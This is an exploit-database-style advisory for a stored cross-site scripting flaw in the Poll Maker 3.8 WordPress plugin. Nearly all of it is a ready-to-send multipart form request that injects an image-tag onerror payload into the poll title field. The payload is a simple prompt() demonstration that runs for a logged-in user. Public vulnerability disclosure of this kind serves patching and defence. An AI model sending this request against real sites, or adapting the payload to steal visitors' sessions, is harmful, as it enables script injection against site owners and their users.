# Exploit Title: Poll Maker 3.8 - Stored XSS Vulnerability # Exploit Author: Gh05t666nero # Team: INDOGHOSTSEC # Date: 1/02/2022 # Vendor : Poll Maker team # Product: https://wordpress.org/plugins/poll-maker/ # Version: 3.8.2 # Summary: Poll Maker plugin is developed to super easily create amazing online polls for your WordPress website with its basic features. You can use it to conduct elections, surveys, or just as an interactive content provider of your website. # Description: The plugin doesn't escape html tags thus allowing malicious javascript code to be triggered by the server. # Tested on: Wordpress 5.8+ # Vulnerability discovered by Gh05t666nero (Ojan) | Cyber Security Foundation Professional Certificate (CSFPC) # Malicious Request (Demo) MUST LOGIN: https://poll-plugin.com/poll-request/ -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_title" "><img src=x onerror=prompt();> -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_select_category" 6 -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_question" Question Default Title -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_answers[]" 1 -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_answers[]" 2 -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_answers[]" 3 -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_request_form_submit" Submit -----------------------------415896663132509490252901865351--